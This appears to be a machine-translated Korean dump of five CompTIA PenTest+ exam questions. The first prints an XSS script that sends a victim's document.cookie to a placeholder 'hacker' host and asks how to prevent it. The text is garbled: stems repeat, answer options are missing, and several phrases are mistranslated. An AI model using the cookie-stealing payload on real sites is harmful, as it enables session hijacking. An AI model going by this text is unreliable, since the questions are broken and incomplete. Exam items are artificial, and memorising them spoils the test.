PT0-002 문제 1
다음 코드가 주어지면:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> 다음 중 이러한 유형의 공격을 방지하는 가장 좋은 방법은 무엇입니까? 공격하시겠습니까? (2개를 선택하세요.)
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> 다음 중 이러한 유형의 공격을 방지하는 가장 좋은 방법은 무엇입니까? 공격하시겠습니까? (2개를 선택하세요.)
PT0-002 문제 2
침투 테스터가 샌드박스 환경에서 모바일 애플리케이션의 새 버전을 테스트하고 있습니다. 애플리케이션과 외부 API 간의 트래픽을 가로채고 해독하기 위해 테스터는 개인 루트 CA를 생성하고 여기에서 인증서를 발급했습니다. 테스터가 테스트에 사용된 스마트폰의 트러스티드 스톤에 루트 CA를 설치했는데도 애플리케이션에서 인증서 불일치를 나타내는 오류가 표시되고 서버에 연결되지 않습니다. 다음 중 어느 것입니까?
오류가 발생한 가장 큰 이유는 무엇입니까?
오류가 발생한 가장 큰 이유는 무엇입니까?
PT0-002 문제 3
침투 테스터가 VoIP 통화 관리자에서 새로 출시된 여러 CVE를 식별했습니다. 테스터가 사용한 검색 도구는 서비스 버전 번호를 기반으로 CVE의 존재 가능성을 확인했습니다. 다음 중 가능한 결과의 검증을 가장 잘 지원하는 방법은 무엇입니까?
PT0-002 문제 4
침투 테스터는 호스트에서 악용을 성공적으로 수행했으며 VLAN 100에서 VLAN 200으로 이동할 수 있었습니다. VLAN 200에는 금융 트랜잭션을 수행하는 서버가 포함되어 있으며 침투 테스터는 이제 공격자 시스템의 로컬 인터페이스에 정적 ARP 항목이 있기를 원합니다. 로컬 캐시에 있습니다. 공격자 시스템에는 다음이 있습니다.
IP 주소: 192.168.1.63
실제 주소: 60-36-dd-a6-c5-33
다음 중 침투 테스터가 정적 ARP 항목을 성공적으로 설정하기 위해 가장 많이 사용할 명령은 무엇입니까?
IP 주소: 192.168.1.63
실제 주소: 60-36-dd-a6-c5-33
다음 중 침투 테스터가 정적 ARP 항목을 성공적으로 설정하기 위해 가장 많이 사용할 명령은 무엇입니까?
PT0-002 문제 5
침투 테스터는 취약점을 찾기 위해 석유 굴착 장치 네트워크를 공격하기로 계약했습니다. 평가를 수행하는 동안 장비의 지원 조직은 데이터 수집을 위한 기업 애플리케이션 및 업스트림 서비스 연결 문제를 보고했습니다. 다음 중 가장 가능성이 높은 범인은 무엇입니까?